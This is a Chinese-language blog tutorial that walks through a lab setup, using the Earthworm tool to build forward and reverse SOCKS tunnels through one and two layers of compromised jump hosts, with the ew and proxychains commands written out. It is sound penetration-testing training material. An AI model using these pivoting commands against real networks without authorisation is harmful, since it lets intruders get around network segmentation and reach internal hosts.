内网隧道——Earthworm(EW)

已于 2024-07-24 17:26:35 修改
阅读量308 收藏 9
点赞数 18
分类专栏: 内网渗透 文章标签: php 开发语言
于 2024-07-24 12:41:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/140653159
版权

文章目录

一、EW介绍

下载地址:EW
常用的命令格式:

参数作用
Ssocksd正向代理
Rcsock反向代理客户端
Rssocks反向代理服务端
Lcx_slave一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机
Lcx_tran通过监听本地端口接收代理请求,并转发给代理提供主机
Lcx_listen通过监听本地端口接收数据,并将其转交给目标网络会连的代理提供主机

二、一层网络

网络拓扑如下:
在这里插入图片描述

攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

2.1 一层正向代理

1、跳板机作为sock隧道的服务端

ew_for_Win.exe -s ssocksd -l 8888
# -s:指定工作模式
# ssocksd:创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去
# -l:监听端口

在这里插入图片描述
2、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5 192.168.111.128 8888参数来完成 proxychains代理配置。此时,kali通过proxychains,作为sock隧道的客户端。
在这里插入图片描述
3、当配置完proxychains代理后,即可在攻击机执行proxychains rdesktop 192.168.52.138命令来远程连接靶机。
在这里插入图片描述

2.2 一层反向代理

1、在攻击机上使用EW工具开启客户端监听,监听本地6666端口,同时6666端口流量映射到8888端口。

./ew_for_linux64 -s rcsocks -e 6666 -d 8888
# -s:指定工作模式
# rcsocks:反向socks代理客户端
# -e:攻击机客户端开启监听端口
# -d:将要映射的端口

在这里插入图片描述
2、在Web服务器使用EW工具连接攻击机客户端监听的6666端口。

ew_for_Win.exe -s rssocks -d 192.168.111.0 -e 6666
# -s:指定工作模式
# rssocks:反向socks代理服务端
# -d:指向客户端(kali)的IP
# -e:指向客户端(kali)开启监听的端口

在这里插入图片描述

4、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5 127.0.0.1 8888参数来完成 proxychains代理配置。
在这里插入图片描述
流量走向:192.168.111.0:8888----192.168.111.0:6666–(socks隧道)–192.168.111.128

5、远程连接靶机

proxychains rdesktop 192.168.52.138

在这里插入图片描述

三、两层网络

网络拓扑如下:
在这里插入图片描述

攻击机kali IP:192.168.111.0
跳板机1 win7 IP:192.168.111.128,192.168.52.143
跳板机2 win server 2008 IP:192.168.52.138,192.168.48.129
靶机win server 2003 IP:192.168.48.128

3.1 二层正向代理

1、在跳板机2上监听本机8888端口。

ew_for_Win.exe -s ssocksd -l 8888
# -s:指定工作模式
# ssocksd:创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去
# -l:监听端口

在这里插入图片描述
2、在跳板机1的7777端口和跳板机2的8888端口之间建立一条socks隧道。

ew_for_Win.exe -s lcx_tran -l 7777 -f 192.168.52.138 -g 8888
# -s:指定工作模式
# -l:指定本机监听端口
# -f:跳板机2的IP
# -g:指定跳板机2监听端口

在这里插入图片描述
3、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5 192.168.111.128 7777参数来完成 proxychains代理配置。
在这里插入图片描述

4、ping 192.168.48.128判断连通性
在这里插入图片描述
流量走向:192.168.111.0–(socks隧道)–192.168.111.128:7777–(socks隧道)–192.168.52.138:8888----192.168.48.128

3.2 二层反向代理

1、在跳板机2上监听本机8888端口。

ew_for_Win.exe -s ssocksd -l 8888
# -s:指定工作模式
# ssocksd:创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去
# -l:监听端口

在这里插入图片描述
2、在kali攻击机上本地监听7777端口,并将7777端口的流量转发到8888端口上。

./ew_for_linux64 -s lcx_listen -l 8888 -e 7777
# -l: kali 监听端口
# -e: kali 转发端口

在这里插入图片描述

3、在跳板机2的8888端口和Kali攻击机的7777端口之间建立隧道。

ew_for_Win.exe -s lcx_slave -d 192.168.111.0 -e 7777 -f 192.168.52.138 -g 8888
# -d:kali攻击机 IP
# -e: kali 7777端口
# -f: 跳板机2 IP
# -g: 跳板机2监听IP

在这里插入图片描述
在这里插入图片描述
4、在kali中修改proxychains4.conf配置文件,并在其底部添加一行socks5 127.0.0.1 8888参数来完成 proxychains代理配置。
在这里插入图片描述
5、ping 192.168.48.128判断连通性
在这里插入图片描述
流量走向:192.168.111.0:8888–(socks隧道)–192.168.111.0:7777–(socks隧道)–192.168.111.128–(socks隧道)–192.168.52.143–(socks隧道)–192.168.52.138:8888----192.168.48.128

PT_silver
关注
  • 18
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网入口——代理搭建&端口转发
Captain_RB的博客
12-19 1万+
内网渗透过程中经常会遇到搭建代理和端口转发的情况,本文记录一些常用工具的使用方法和典型应用场景,便于查阅。
EWEarthworm
06-08
EWEarthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
内网内网转发】——代理转发_ew(Earthworm)代理转发
weixin_45588247的博客
09-11 4854
文章目录一、实验环境:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:2. 网络拓扑图:3. 说明:4. 实验过程:八、ew(Earthworm)反向代理:1. 一级代理:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程:2. 二级代理(一):2.1 场景:2.2 网络拓扑图:2.3 说明:2.4 实验过程: 一、实验环境: 角色 系统
【渗透测试笔记】之【内网渗透——应用层隧道EarthWorm的使用:各种复杂内网(一二三级网络)环境中的socks代理方法))】
AA8j的博客
10-27 685
下载地址 https://github.com/AA8j/SecTools/tree/main/ew 1. 普通网络 在普通网络环境下,可直接通过跳板机访问内网特定资源。 1.1 跳板机存在公网IP 1.1.1 网络环境 目标主机(公网IP:1.1.1.1,可访问特定内网资源)(跳板机) 1.1.2 使用方法 目标主机(公网IP:1.1.1.1,可访问特定内网资源): ew -s ssocksd -l 8888 侦听本机的8888端口,提供socks代理 1.1.3 流量走向 本地主机--->1.
内网安全】 隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目
今天是几号的博客
03-23 1358
推荐 相当于自己管理整个平台很方便nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
EarthWorm 内网穿透神器
01-18
EarthWorm是一套轻量便携且功能强大...相较于其他穿透工具,如reGeorg等, EarthWorm可以穿透更复杂的内网环境同时也不需要跳板机运行web服务,也可以支持多平台间的转接通讯,如Linux、Windows、MacOS、Arm-Linux等。
earthworm全套.zip
10-14
包含全套earthworm服务器、客户端。EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条...
ew-EarthWorm.zip
09-12
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有...
使用Earthworm (EW) 做Socks5代理
01-09
1.选择合适的ew文件(将文件ew_…改为ew.exe,为了在命令行少敲几个字母),上传到边缘服务器 2.边缘服务器输入 ew.exe -s ssocksd -l 8000 3.可借助proxifier工具配置攻击机整台机器的代理(proxifier添加代理服务器...
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 575
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 436
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
PHP项目开发流程概述
api77的博客
07-19 557
需求分析是项目开发的起始点,主要目的是明确项目的目标、功能需求、用户群体等。这一阶段通常通过用户访谈、市场调研、竞品分析等方式进行。
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 713
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
rce漏洞-ctfshow(50-70)
m0_74402888的博客
07-23 696
文件名:
【CTFWP】ctfshow-web42
LongL_GuYu的博客
07-23 610
CTFWP,ctfshow-web42
网络芯片(又称为PHY网络芯片)
最新发布
czy8787475的博客
07-23 107
网络芯片(又称为PHY网络芯片)
BGP选路之Next Hop
txs1269928052的博客
07-23 406
根据前面的实验步骤得知,10.0.100.1/32路由在R1上的Next Hop为0.0.0.0,说明当10.0.100.1/32的路由信息在由R1传递至EBGP对等体R2的过程中,Next Hop属性会被自动修改为发送BGP报文的源地址,即 10.0.12.1。R3上的现象与R2上的现象类似,这里不再赘述。为了使R4的BGP路由表中去往10.0.100.1/32的路由信息标记为可用,并放进P路由表中,必须使R4去往10.0.100.1/32的 BGP路由信息中的Next Hop是可达的。
深入理解Linux网络(一):内核如何接收网络包
又见南风的博客
07-18 921
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
earthworm的linux使用
03-27
作为人工智能语言模型,我无法在Linux上使用Earthworm软件,但我可以告诉您如何在Linux系统上安装和使用Earthworm软件。 安装Earthworm软件 1. 下载Earthworm软件包,可以从官网或Github上获取最新版本。 2. 解压缩Earthworm软件包,可以使用tar命令进行解压缩。 3. 进入解压缩后的Earthworm目录,使用make命令进行编译和安装。 4. 在安装过程中,可以根据需要选择安装Earthworm的各个模块和插件。 使用Earthworm软件 1. 在启动Earthworm之前,需要先配置Earthworm环境变量,可以将Earthworm的bin目录添加到系统的PATH环境变量中。 2. 启动Earthworm服务,可以使用ewd命令启动Earthworm daemon进程。 3. 使用各个Earthworm模块和插件,可以根据需要进行配置和启动。 4. 查看Earthworm日志和输出信息,可以使用ewlog命令查看Earthworm日志文件,使用ewcmd命令查看Earthworm模块和插件的输出信息。 需要注意的是,Earthworm软件是一个高级的地震数据处理系统,需要一定的专业知识和经验才能够正确地使用。在使用Earthworm软件时,请务必仔细阅读相关文档和使用说明,以免造成不必要的损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值